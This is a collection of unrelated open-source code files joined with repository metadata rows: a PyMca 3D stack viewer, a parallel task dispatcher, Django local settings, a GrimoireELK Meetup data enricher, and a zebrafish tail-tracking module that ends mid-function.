maxValue = self._configuration['common']['colormap'][3] - tinyNumber
Object3DCTools.draw3DGridPoints(self._x,
self._y,
self._z,
self.vertexSelectionColors,
self.values,
0,
[1, minValue, maxValue])
else:
Object3DCTools.draw3DGridPoints(self._x,
self._y,
self._z,
self.vertexSelectionColors,
self.values,
0,
self._configuration['private']['useminmax'])
else:
Object3DCTools.draw3DGridPoints(self._x,
self._y,
self._z,
self.vertexColors,
self.values,
self._configuration['private']['colorfilter'],
self._configuration['private']['useminmax'])
def buildWireList(self):
Object3DCTools.draw3DGridLines(self._x,
self._y,
self._z,
self.vertexColors)
def __fillVerticesBufferObject(self):
if self.vertices is None:
self.vertices = Object3DCTools.get3DGridFromXYZ(self._x,
self._y,
self._z)
self.indices = numpy.arange(self.nVertices)
self._verticesBufferObject = buffers.VertexBuffer(self.vertices,
GL.GL_STATIC_DRAW)
self.vertices = None
print "self._vertexBufferObject = ", self._verticesBufferObject
def __fillVertexColorsBufferObject(self):
if self.vertexColors is None:
if self.vertexSelectionColors is None:
i = numpy.arange(self.nVertices)
self.vertexSelectionColors = numpy.zeros((self.nVertices,4),
numpy.uint8)
self.vertexSelectionColors[:,0] = (i & 255)
self.vertexSelectionColors[:,1] = ((i >> 8) & 255)
self.vertexSelectionColors[:,2] = ((i >> 16) & 255)
self.vertexSelectionColors[:,3] = 255 - (i >> 24)
self._vertexColorsBufferObject = buffers.VertexBuffer(self.vertexSelectionColors,
GL.GL_STATIC_DRAW)
print "self._vertexColorsBufferObject = ", self._vertexColorsBufferObject
def buildPointListNEW(self, selection=False):
if self._verticesBufferObject is None:
self.__fillVerticesBufferObject()
if self._vertexColorsBufferObject is None:
self.__fillVertexColorsBufferObject()
#self._vertexSelectionColorBufferObject = None
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
GL.glEnableClientState(GL.GL_COLOR_ARRAY)
self._verticesBufferObject.bind()
self._vertexColorsBufferObject.bind()
GL.glDrawElements(GL.GL_POINTS, self.indices)
GL.glDisableClientState(GL.GL_VERTEX_ARRAY)
GL.glDisableClientState(GL.GL_COLOR_ARRAY)
def buildPointListOLD(self):
if self.vertices is None:
self.vertices = Object3DCTools.get3DGridFromXYZ(self._x,
self._y,
self._z)
GL.glVertexPointerf(self.vertices)
GL.glColorPointerub(self.vertexColors)
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
GL.glEnableClientState(GL.GL_COLOR_ARRAY)
GL.glDrawArrays(GL.GL_POINTS, 0, self.nVertices)
def buildPointList0(self):
"""
This is just to test memory and speed
"""
n1, n2, n3 = 256, 256, 256
print "OLD TOTAL = ",71 * 80 * 2000
print "TOTAL = ", 256 * 256 * 256
zdata = numpy.arange(n1*n2*n3).astype(numpy.float32)
zdata.shape= -1, 1
print zdata.shape
(image,size,minmax)= spslut.transform(zdata,
(1,0),
(spslut.LINEAR,3.0),
"RGBX",
spslut.TEMP,
1,
(0, 1),
(0, 255),1)
image.shape = -1, 4
image[:,3] = 255
#self.vertexColors = image.astype(numpy.float32)
x = numpy.arange(n1).astype(numpy.float32)
y = numpy.arange(n2).astype(numpy.float32)
z = numpy.arange(n3).astype(numpy.float32)
#Object3DCTools.draw3DGridQuads(x, y, y)
#Object3DCTools.draw3DGridLines(x, y, z, image)
Object3DCTools.draw3DGridPoints(x, y, z, image)
self.zdata = zdata
def getIndexValues(self, index):
"""
x,y,z, I
"""
xindex = int(index/(self.ySize*self.zSize))
yindex = int((index % (self.ySize*self.zSize))/self.zSize)
zindex = index % self.zSize
#print "index = ", index, "xindex = ", xindex, "yindex = ", yindex, "zindex = ", zindex
if len(self.values.shape) == 3:
value = self.values[xindex, yindex, zindex]
else:
value = self.values[index]
return self._x[xindex], self._y[yindex], self._z[zindex], value
MENU_TEXT = '4D Stack'
def getObject3DInstance(config=None):
#for the time being a former configuration
#for serializing purposes is not implemented
#I do the import here for the case PyMca is not installed
#because the modules could be instanstiated without using
#this method
try:
from PyMca import EDFStack
from PyMca import TiffStack
except ImportError:
import EDFStack
import TiffStack
fileTypeList = ['EDF Z Stack (*edf *ccd)',
'EDF X Stack (*edf *ccd)',
'TIFF Stack (*tif *tiff)']
old = Object3DFileDialogs.Object3DDirs.nativeFileDialogs * 1
Object3DFileDialogs.Object3DDirs.nativeFileDialogs = False
fileList, filterUsed = Object3DFileDialogs.getFileList(None, fileTypeList,
"Please select the object file(s)",
"OPEN",
True)
Object3DFileDialogs.Object3DDirs.nativeFileDialogs = old
if not len(fileList):
return None
if filterUsed == fileTypeList[0]:
fileindex = 2
else:
fileindex = 1
#file index is irrelevant in case of an actual 3D stack.
filename = fileList[0]
legend = os.path.basename(filename)
if filterUsed == fileTypeList[2]:
#TIFF
stack = TiffStack.TiffStack(dtype=numpy.float32, imagestack=False)
stack.loadFileList(fileList, fileindex=1)
elif len(fileList) == 1:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
stack.loadIndexedStack(filename, fileindex=fileindex)
else:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
stack.loadFileList(fileList, fileindex=fileindex)
if stack is None:
raise IOError("Problem reading stack.")
object3D = Object3DStack(name=legend)
object3D.setStack(stack)
return object3D
if __name__ == "__main__":
import sys
from Object3D import SceneGLWindow
import os
try:
from PyMca import EDFStack
from PyMca import EdfFile
except ImportError:
import EDFStack
import EdfFile
import getopt
options = ''
longoptions = ["fileindex=","begin=", "end="]
try:
opts, args = getopt.getopt(
sys.argv[1:],
options,
longoptions)
except getopt.error,msg:
print msg
sys.exit(1)
fileindex = 2
begin = None
end = None
for opt, arg in opts:
if opt in '--begin':
begin = int(arg)
elif opt in '--end':
end = int(arg)
elif opt in '--fileindex':
fileindex = int(arg)
app = qt.QApplication(sys.argv)
window = SceneGLWindow.SceneGLWindow()
window.show()
if len(sys.argv) == 1:
object3D = getObject3DInstance()
if object3D is not None:
window.addObject(object3D)
else:
if len(sys.argv) > 1:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
filename = args[0]
else:
stack = EDFStack.EDFStack(dtype=numpy.float32, imagestack=False)
filename = "..\COTTE\ch09\ch09__mca_0005_0000_0070.edf"
if os.path.exists(filename):
print "fileindex = ", fileindex
stack.loadIndexedStack(filename, begin=begin, end=end, fileindex=fileindex)
object3D = Object3DStack()
object3D.setStack(stack)
stack = 0
else:
print "filename %s does not exists" % filename
sys.exit(1)
time.sleep(1)
print "START ADDING"
window.addObject(object3D, "STACK")
window.setSelectedObject("STACK")
print "END ADDING"
window.glWidget.setZoomFactor(1.0)
window.show()
app.exec_()
| gpl-2.0 | -4,443,805,194,613,521,000 | 40.937288 | 120 | 0.508225 | false |
agraubert/agutil | agutil/parallel/src/dispatcher.py | 1 | 2555 | from .exceptions import _ParallelBackgroundException
from .worker import ThreadWorker, ProcessWorker
from itertools import zip_longest
WORKERTYPE_THREAD = ThreadWorker
WORKERTYPE_PROCESS = ProcessWorker
class IterDispatcher:
def __init__(
self,
func,
*args,
maximum=15,
workertype=WORKERTYPE_THREAD,
**kwargs
):
self.func = func
self.maximum = maximum
self.args = [iter(arg) for arg in args]
self.kwargs = {key: iter(v) for (key, v) in kwargs.items()}
self.worker = workertype
def run(self):
yield from self.dispatch()
def dispatch(self):
self.worker = self.worker(self.maximum)
try:
output = []
for args, kwargs in self._iterargs():
# _args = args if args is not None else []
# _kwargs = kwargs if kwargs is not None else {}
output.append(self.worker.work(
self.func,
*args,
**kwargs
))
for callback in output:
result = callback()
if isinstance(result, _ParallelBackgroundException):
raise result.exc
yield result
finally:
self.worker.close()
def _iterargs(self):
while True:
args = []
had_arg = False
for src in self.args:
try:
args.append(next(src))
had_arg = True
except StopIteration:
return # args.append(None)
kwargs = {}
for key, src in self.kwargs.items():
try:
kwargs[key] = next(src)
had_arg = True
except StopIteration:
return # kwargs[key] = None
if not had_arg:
return
yield args, kwargs
def __iter__(self):
yield from self.dispatch()
def is_alive(self):
return self.worker.is_alive()
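# Added usage sketch (illustrative, not part of the original module): iterating an
# IterDispatcher yields one result per argument tuple, in submission order, e.g.
#   results = list(IterDispatcher(pow, [2, 3, 4], [2, 2, 2], maximum=4))
#   # -> [4, 9, 16]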
class DemandDispatcher:
def __init__(self, func, maximum=15, workertype=WORKERTYPE_THREAD):
self.maximum = maximum
self.func = func
self.worker = workertype(self.maximum)
def dispatch(self, *args, **kwargs):
try:
return self.worker.work(self.func, *args, **kwargs)
except BaseException:
self.worker.close()
raise
def close(self):
self.worker.close()
| mit | 1,826,956,604,685,546,800 | 27.707865 | 71 | 0.508415 | false |
juliancantillo/royal-films | config/settings/local.py | 1 | 1950 | # -*- coding: utf-8 -*-
'''
Local settings
- Run in Debug mode
- Use console backend for emails
- Add Django Debug Toolbar
- Add django-extensions as app
'''
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = env("DJANGO_SECRET_KEY", default='t3kohnptyzfb7v@s@4dlm2o1356rz&^oamd-y34qat^^69b+s(')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
default='django.core.mail.backends.console.EmailBackend')
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ('127.0.0.1', '10.0.2.2',)
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
# Your local stuff: Below this line define 3rd party library settings
| mit | -7,272,907,053,856,914,000 | 30.451613 | 99 | 0.488205 | false |
grimoirelab/GrimoireELK | grimoire_elk/enriched/meetup.py | 1 | 13379 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2019 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Alvaro del Castillo San Felix <[email protected]>
#
import copy
import logging
from grimoirelab_toolkit.datetime import unixtime_to_datetime
from .enrich import Enrich, metadata
from ..elastic_mapping import Mapping as BaseMapping
MAX_SIZE_BULK_ENRICHED_ITEMS = 200
logger = logging.getLogger(__name__)
class Mapping(BaseMapping):
@staticmethod
def get_elastic_mappings(es_major):
"""Get Elasticsearch mapping.
:param es_major: major version of Elasticsearch, as string
:returns: dictionary with a key, 'items', with the mapping
"""
mapping = """
{
"properties": {
"description_analyzed": {
"type": "text",
"index": true
},
"comment": {
"type": "text",
"index": true
},
"venue_geolocation": {
"type": "geo_point"
},
"group_geolocation": {
"type": "geo_point"
}
}
} """
return {"items": mapping}
class MeetupEnrich(Enrich):
mapping = Mapping
def get_field_author(self):
return "author"
def get_identities(self, item):
''' Return the identities from an item '''
item = item['data']
# Creators
if 'event_hosts' in item:
user = self.get_sh_identity(item['event_hosts'][0])
yield user
# rsvps
rsvps = item.get('rsvps', [])
for rsvp in rsvps:
user = self.get_sh_identity(rsvp['member'])
yield user
# Comments
for comment in item['comments']:
user = self.get_sh_identity(comment['member'])
yield user
def get_sh_identity(self, item, identity_field=None):
identity = {'username': None, 'email': None, 'name': None}
if not item:
return identity
user = item
if 'data' in item and type(item) == dict:
user = item['data'][identity_field]
identity['username'] = str(user["id"])
identity['email'] = None
identity['name'] = user["name"]
return identity
def get_project_repository(self, eitem):
return eitem['tag']
@metadata
def get_rich_item(self, item):
# We need to detect the category of item: activities (report), events or users
eitem = {}
if 'time' not in item['data']:
logger.warning("[meetup] Not processing %s: no time field", item['uuid'])
return eitem
for f in self.RAW_FIELDS_COPY:
if f in item:
eitem[f] = item[f]
else:
eitem[f] = None
event = item['data']
# data fields to copy
copy_fields = ["id", "how_to_find_us"]
for f in copy_fields:
if f in event:
eitem[f] = event[f]
else:
eitem[f] = None
# Fields which names are translated
map_fields = {
"link": "url",
"rsvp_limit": "rsvps_limit"
}
for fn in map_fields:
if fn in event:
eitem[map_fields[fn]] = event[fn]
else:
                eitem[map_fields[fn]] = None
# event host fields: author of the event
if 'event_hosts' in event:
host = event['event_hosts'][0]
if 'photo' in host:
eitem['member_photo_url'] = host['photo']['photo_link']
eitem['member_photo_id'] = host['photo']['id']
eitem['member_photo_type'] = host['photo']['type']
eitem['member_is_host'] = True
eitem['member_id'] = host['id']
eitem['member_name'] = host['name']
eitem['member_url'] = "https://www.meetup.com/members/" + str(host['id'])
eitem['event_url'] = event['link']
        # data fields to copy with meetup prefix
copy_fields = ["description", "plain_text_description",
"name", "status", "utc_offset", "visibility",
"waitlist_count", "yes_rsvp_count", "duration",
"featured", "rsvpable"]
copy_fields_time = ["time", "updated", "created"]
for f in copy_fields:
if f in event:
eitem["meetup_" + f] = event[f]
else:
eitem[f] = None
for f in copy_fields_time:
if f in event:
eitem["meetup_" + f] = unixtime_to_datetime(event[f] / 1000).isoformat()
else:
eitem[f] = None
rsvps = event.get('rsvps', [])
eitem['num_rsvps'] = len(rsvps)
eitem['num_comments'] = len(event['comments'])
try:
if 'time' in event:
eitem['time_date'] = unixtime_to_datetime(event['time'] / 1000).isoformat()
else:
logger.warning("time field nof found in event")
return {}
except ValueError:
logger.warning("Wrong datetime for %s: %s", eitem['url'], event['time'])
# If no datetime for the enriched item, it is useless for Kibana
return {}
if 'venue' in event:
venue = event['venue']
copy_fields = ["id", "name", "city", "state", "zip", "country",
"localized_country_name", "repinned", "address_1"]
for f in copy_fields:
if f in venue:
eitem["venue_" + f] = venue[f]
else:
eitem[f] = None
eitem['venue_geolocation'] = {
"lat": event['venue']['lat'],
"lon": event['venue']['lon'],
}
if 'series' in event:
eitem['series_id'] = event['series']['id']
eitem['series_description'] = event['series']['description']
eitem['series_start_date'] = event['series']['start_date']
if 'group' in event:
group = event['group']
copy_fields = ["id", "created", "join_mode", "name", "url_name",
"who"]
for f in copy_fields:
if f in group:
eitem["group_" + f] = group[f]
else:
eitem[f] = None
eitem['group_geolocation'] = {
"lat": group['lat'],
"lon": group['lon'],
}
eitem['group_topics'] = []
eitem['group_topics_keys'] = []
if 'topics' in group:
group_topics = [topic['name'] for topic in group['topics']]
group_topics_keys = [topic['urlkey'] for topic in group['topics']]
eitem['group_topics'] = group_topics
eitem['group_topics_keys'] = group_topics_keys
if len(rsvps) > 0:
eitem['group_members'] = rsvps[0]['group']['members']
created = unixtime_to_datetime(event['created'] / 1000).isoformat()
eitem['type'] = "meetup"
# time_date is when the meetup will take place, the needed one in this index
# created is when the meetup entry was created and it is not the interesting date
eitem.update(self.get_grimoire_fields(eitem['time_date'], eitem['type']))
if self.sortinghat:
eitem.update(self.get_item_sh(event))
if self.prjs_map:
eitem.update(self.get_item_project(eitem))
self.add_repository_labels(eitem)
self.add_metadata_filter_raw(eitem)
return eitem
def get_item_sh(self, item):
""" Add sorting hat enrichment fields """
sh_fields = {}
# Not shared common get_item_sh because it is pretty specific
if 'member' in item:
# comment and rsvp
identity = self.get_sh_identity(item['member'])
elif 'event_hosts' in item:
# meetup event
identity = self.get_sh_identity(item['event_hosts'][0])
else:
return sh_fields
created = unixtime_to_datetime(item['created'] / 1000)
sh_fields = self.get_item_sh_fields(identity, created)
return sh_fields
def get_rich_item_comments(self, comments, eitem):
for comment in comments:
ecomment = copy.deepcopy(eitem)
created = unixtime_to_datetime(comment['created'] / 1000).isoformat()
ecomment['url'] = comment['link']
ecomment['id'] = ecomment['id'] + '_comment_' + str(comment['id'])
ecomment['comment'] = comment['comment']
ecomment['like_count'] = comment['like_count']
ecomment['type'] = 'comment'
ecomment.update(self.get_grimoire_fields(created, ecomment['type']))
ecomment.pop('is_meetup_meetup')
# event host fields: author of the event
member = comment['member']
if 'photo' in member:
ecomment['member_photo_url'] = member['photo']['photo_link']
ecomment['member_photo_id'] = member['photo']['id']
ecomment['member_photo_type'] = member['photo']['type']
if 'event_context' in member:
ecomment['member_is_host'] = member['event_context']['host']
ecomment['member_id'] = member['id']
ecomment['member_name'] = member['name']
ecomment['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
if self.sortinghat:
ecomment.update(self.get_item_sh(comment))
yield ecomment
def get_rich_item_rsvps(self, rsvps, eitem):
for rsvp in rsvps:
ersvp = copy.deepcopy(eitem)
ersvp['type'] = 'rsvp'
created = unixtime_to_datetime(rsvp['created'] / 1000).isoformat()
ersvp.update(self.get_grimoire_fields(created, ersvp['type']))
ersvp.pop('is_meetup_meetup')
# event host fields: author of the event
member = rsvp['member']
if 'photo' in member:
ersvp['member_photo_url'] = member['photo']['photo_link']
ersvp['member_photo_id'] = member['photo']['id']
ersvp['member_photo_type'] = member['photo']['type']
ersvp['member_is_host'] = member['event_context']['host']
ersvp['member_id'] = member['id']
ersvp['member_name'] = member['name']
ersvp['member_url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['id'] = ersvp['id'] + '_rsvp_' + str(rsvp['event']['id']) + "_" + str(member['id'])
ersvp['url'] = "https://www.meetup.com/members/" + str(member['id'])
ersvp['rsvps_guests'] = rsvp['guests']
ersvp['rsvps_updated'] = rsvp['updated']
ersvp['rsvps_response'] = rsvp['response']
if self.sortinghat:
ersvp.update(self.get_item_sh(rsvp))
yield ersvp
def get_field_unique_id(self):
return "id"
def enrich_items(self, ocean_backend):
items_to_enrich = []
num_items = 0
ins_items = 0
for item in ocean_backend.fetch():
eitem = self.get_rich_item(item)
if 'uuid' not in eitem:
continue
items_to_enrich.append(eitem)
if 'comments' in item['data'] and 'id' in eitem:
comments = item['data']['comments']
rich_item_comments = self.get_rich_item_comments(comments, eitem)
items_to_enrich.extend(rich_item_comments)
if 'rsvps' in item['data'] and 'id' in eitem:
rsvps = item['data']['rsvps']
rich_item_rsvps = self.get_rich_item_rsvps(rsvps, eitem)
items_to_enrich.extend(rich_item_rsvps)
if len(items_to_enrich) < MAX_SIZE_BULK_ENRICHED_ITEMS:
continue
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
items_to_enrich = []
if len(items_to_enrich) > 0:
num_items += len(items_to_enrich)
ins_items += self.elastic.bulk_upload(items_to_enrich, self.get_field_unique_id())
if num_items != ins_items:
missing = num_items - ins_items
logger.error("%s/%s missing items for Meetup", str(missing), str(num_items))
else:
logger.info("%s items inserted for Meetup", str(num_items))
return num_items
| gpl-3.0 | -4,369,405,093,059,499,000 | 33.660622 | 101 | 0.52545 | false |
ver228/tierpsy-tracker | tierpsy/analysis/ske_create/zebrafishAnalysis/zebrafishAnalysis.py | 1 | 17590 | # Zebrafish Analysis
import math
import numpy as np
import cv2
from scipy.signal import savgol_filter
class ModelConfig:
def __init__(self, num_segments, min_angle, max_angle, num_angles, tail_length, tail_detection, prune_retention, test_width, draw_width, auto_detect_tail_length):
self.min_angle = min_angle # Minimum angle for each segment (relative to previous segment)
self.max_angle = max_angle # Maximum angle for each segment
self.num_models_per_segment = num_angles # Number of angles to try for each segment
self.prune_freq = 1 # When constructing the model, segment interval at which the model pruning function is called. Lower numbers are faster
self.max_num_models_to_keep = prune_retention # Number of models retained after each round of pruning
segment_height = int(tail_length / num_segments)
self.segment_heights = [segment_height] * num_segments # Length must match num_segments
        self.segment_widths = [test_width] * num_segments # Used for constructing and testing straight-line models. Length must match num_segments
self.num_segments = num_segments
self.smoothed_segment_width = draw_width # Used for drawing the final smoothed version of the tail curve
self.tail_offset = 30 # Distance in pixels from the head point to the tail model start point
self.rotated_img_size = 200 # Size of the internal image of the rotated fish
self.tail_point_detection_algorithm = tail_detection
# Auto-detect tail length settings
self.auto_detect_tail_length = auto_detect_tail_length
if auto_detect_tail_length:
# Override number of segments with a high number
# Tail end will be detected automatically before this is reached and model generation will be stopped at that point
self.num_segments = 20
self.segment_heights = [5] * self.num_segments
self.segment_widths = [2] * self.num_segments
self.segment_score_improvement_threshold = 250 # Amount by which a segment must improve the model score to be considered valid. If 'num_fail_segments' segments in a row are considered invalid, no further segments are added to that model
self.num_fail_segments = 2 # Number of continuous segments which fail to meet the threshold improvement score for model generation to stop
self.min_segments = 5 # Minimum number of segments in the model - There will be at least this many segments, even if the failing criteria is reached
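# Example construction (illustrative only; the numbers below are arbitrary, not tuned
# values from this project): a 10-segment tail model that tries 15 angles between
# -25 and +25 degrees per segment and keeps the 4 best partial models when pruning.
#
#   config = ModelConfig(num_segments=10, min_angle=-25, max_angle=25, num_angles=15,
#                        tail_length=60, tail_detection=0,   # algorithm id chosen by the caller
#                        prune_retention=4, test_width=2, draw_width=2,
#                        auto_detect_tail_length=False)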
class MaskCanvas:
def __init__(self, canvas_width, canvas_height):
self.canvas = np.zeros((canvas_width, canvas_height), np.uint8)
self.points = []
self.scores = [0]
self.angle_offset = 0
def add_point(self, point):
self.points.append(point)
def last_point(self):
return self.points[-1] if len(self.points) > 0 else None
def last_score(self):
return self.scores[-1]
def score_improvement(self, n):
if len(self.scores) < n + 1:
return 0
return self.scores[-1 * n] - self.scores[-1 * (n+1)]
def getOrientation(frame, config):
th_val = 1
ret, binary_img = cv2.threshold(frame, th_val, 255, cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(binary_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
# Sort contours by area
contours.sort(key=lambda ar: cv2.contourArea(ar))
largest_contour = contours[-1]
[vx, vy, x, y] = cv2.fitLine(largest_contour, cv2.DIST_L2, 0, 0.01, 0.01)
line_angle = math.atan2(vy, vx)
line_angle_degrees = math.degrees(line_angle)
angle = line_angle_degrees + 90
x, y, w, h = cv2.boundingRect(largest_contour)
img_cropped = frame[y:y+h, x:x+w]
rotated_img, actual_angle = rotateFishImage(img_cropped, angle, config)
return rotated_img, actual_angle
def rotateFishImage(img, angle_degrees, config):
input_image = np.zeros((config.rotated_img_size, config.rotated_img_size), np.uint8)
y_mid = config.rotated_img_size // 2
def _get_range(l):
bot = math.floor(y_mid - l/2)
top = math.floor(y_mid + l/2)
return bot, top
h_ran, w_ran = list(map(_get_range, img.shape))
input_image[h_ran[0]:h_ran[1], w_ran[0]:w_ran[1]] = img
rows, cols = input_image.shape
center = (rows//2, cols//2)
M = cv2.getRotationMatrix2D(center, angle_degrees, 1.0)
rotated_img = cv2.warpAffine(input_image, M, (cols, rows))
img_top = rotated_img[0:y_mid, 0:config.rotated_img_size]
img_bottom = rotated_img[y_mid:config.rotated_img_size, 0:config.rotated_img_size]
# Use valid pixel count to determine which half contains the head
top_area = len(img_top[img_top != 0])
bottom_area = len(img_bottom[img_bottom != 0])
head_half = img_top if bottom_area < top_area else img_bottom
# Find rotation angle again, this time only using the head half
contours, hierarchy = cv2.findContours(head_half.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contours.sort(key=lambda ar: ar.size)
largest_contour = contours[-1]
[vx, vy, x, y] = cv2.fitLine(largest_contour, cv2.DIST_L2, 0, 0.01, 0.01)
line_angle = math.atan2(vy, vx)
line_angle_degrees = (math.degrees(line_angle) + 90) % 360
final_angle = (angle_degrees + line_angle_degrees) % 360
rows, cols = input_image.shape[:2]
center = (rows/2, cols/2)
M = cv2.getRotationMatrix2D(center, final_angle, 1.0)
rotated_output_img = cv2.warpAffine(input_image, M, (cols, rows))
# Check again whether the image is rotated 180 degrees, and correct if necessary
img_top = rotated_output_img[0:y_mid, 0:config.rotated_img_size]
img_bottom = rotated_output_img[y_mid:config.rotated_img_size, 0:config.rotated_img_size]
top_area = len(img_top[img_top != 0])
bottom_area = len(img_bottom[img_bottom != 0])
if bottom_area > top_area:
correction_angle = 180
M = cv2.getRotationMatrix2D(center, correction_angle, 1.0)
rotated_output_img = cv2.warpAffine(rotated_output_img, M, (cols, rows))
final_angle = (final_angle + correction_angle) % 360
return rotated_output_img, final_angle
def getHeadMask(frame):
th_val = 1
ret, img_thresh = cv2.threshold(frame, th_val, 255, cv2.THRESH_BINARY)
# Remove excess noise by drawing only the largest contour
head_mask = np.zeros((img_thresh.shape[0], img_thresh.shape[1]), np.uint8)
contours, hierarchy = cv2.findContours(img_thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contours.sort(key=lambda ar: ar.size)
head_contour = contours[-1]
cv2.drawContours(head_mask, [head_contour], 0, 255, cv2.FILLED)
return head_mask
def getHeadPoint(rotated_img, angle):
theta = math.radians(- angle)
img_binary = np.zeros(rotated_img.shape, np.uint8)
contours, hierarchy = cv2.findContours(rotated_img.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contours.sort(key=lambda ar: ar.size)
largest_contour = contours[-1]
cv2.drawContours(img_binary, [largest_contour], 0, 255, cv2.FILLED)
valid_pixels = np.nonzero(img_binary)
x = valid_pixels[1]
y = valid_pixels[0]
head_x = x[np.argmin(y)]
head_y = np.min(y)
w, h = rotated_img.shape[:2]
center_x = w / 2
center_y = h / 2
hypot = math.hypot(center_x - head_x, center_y - head_y)
rotated_head_x = center_x - (hypot * math.sin(theta))
rotated_head_y = center_y - (hypot * math.cos(theta))
return rotated_head_x, rotated_head_y
def getTailStartPoint(head_mask, head_point, config):
# Calculate the angle from the head point to the contour center
# Then, 'walk' down the line from the head point to the contour center point a set length
contours, hierarchy = cv2.findContours(head_mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
contour = contours[-1]
# Get contour center
contour_moments = cv2.moments(contour)
contour_center_x = int(contour_moments['m10'] / contour_moments['m00'])
contour_center_y = int(contour_moments['m01'] / contour_moments['m00'])
head_x = head_point[0]
head_y = head_point[1]
head_contour_center_angle = math.atan2(contour_center_y - head_y, contour_center_x - head_x)
head_x = head_point[0]
head_y = head_point[1]
# Calculate tail start point
tail_start_x = head_x + config.tail_offset * math.cos(head_contour_center_angle)
tail_start_y = head_y + config.tail_offset * math.sin(head_contour_center_angle)
return (int(tail_start_x), int(tail_start_y))
def getModelMasks(head_mask, base_angle, frame, head_point, config):
# Generate the test image used for scoring models
test_image = getTestImage(frame, head_mask, head_point, base_angle, config)
# Create starting object
initial_canvas = MaskCanvas(head_mask.shape[0], head_mask.shape[1])
# Add tail starting point
initial_point = getTailStartPoint(head_mask, head_point, config)
initial_canvas.add_point(initial_point)
# Set base angle
initial_canvas.angle_offset = -base_angle
canvas_set = [initial_canvas]
output_canvas_set = drawModelSegments(canvas_set, config.num_segments, test_image, config)
return output_canvas_set
def getTestImage(frame, head_mask, head_point, angle, config):
# Remove the head from the test image using a triangular mask, so it doesn't interfere with tail model scoring
center_x, center_y = getTailStartPoint(head_mask, head_point, config)
triangle_length = 100
t0_angle_radians = math.radians(angle)
t0_x = center_x + triangle_length * math.sin(t0_angle_radians)
t0_y = center_y - triangle_length * math.cos(t0_angle_radians)
t1_angle_radians = math.radians(angle - 90)
t1_x = center_x + triangle_length * math.sin(t1_angle_radians)
t1_y = center_y - triangle_length * math.cos(t1_angle_radians)
t2_angle_radians = math.radians(angle + 90)
t2_x = center_x + triangle_length * math.sin(t2_angle_radians)
t2_y = center_y - triangle_length * math.cos(t2_angle_radians)
triangle_points = np.array([(t0_x, t0_y), (t1_x, t1_y), (t2_x, t2_y)]).astype('int32')
test_image = frame.copy()
cv2.fillConvexPoly(test_image, triangle_points, 0)
return test_image
def drawModelSegments(canvas_set, num_segments, test_image, config):
angle_increment = (config.max_angle - config.min_angle) / config.num_models_per_segment
output_set = []
for canvas in canvas_set:
for i in range(0, config.num_models_per_segment + 1):
# Calculate segment rotation angle
rotation_angle = config.min_angle + (i * angle_increment)
# Draw line on canvas
new_canvas = MaskCanvas(0, 0)
new_canvas.canvas = canvas.canvas.copy()
new_canvas.points = list(canvas.points)
new_canvas.angle_offset = canvas.angle_offset
new_canvas.scores = list(canvas.scores)
segment_width = config.segment_widths[-num_segments]
segment_height = config.segment_heights[-num_segments]
canvas_with_segment = drawSegmentOnCanvas(new_canvas, rotation_angle, segment_width, segment_height)
# Add canvas to output set
output_set.append(canvas_with_segment)
# Prune the models with the lowest scores
if num_segments % config.prune_freq == 0:
end_generation, output_set = pruneModels(test_image, output_set, config.max_num_models_to_keep, config)
# If auto-detect tail length is enabled, check for 'end model generation' flag
if config.auto_detect_tail_length:
if end_generation is True and num_segments < config.num_segments - config.min_segments:
i = len(output_set[0].points) - config.num_fail_segments # Remove the final failing segments
output_set[0].points = output_set[0].points[0:i]
return output_set
# Call the function recursively until all segments have been drawn on the canvases
if num_segments > 1:
return drawModelSegments(output_set, num_segments - 1, test_image, config)
else:
return output_set
def drawSegmentOnCanvas(canvas, angle, segment_width, segment_height):
# Take into account previous angles
adjusted_angle = angle + canvas.angle_offset
# Convert angle from degrees to radians
angle_radians = math.radians(adjusted_angle)
# Calculate position of next point
pt_x = canvas.last_point()[0] + segment_height * math.sin(angle_radians)
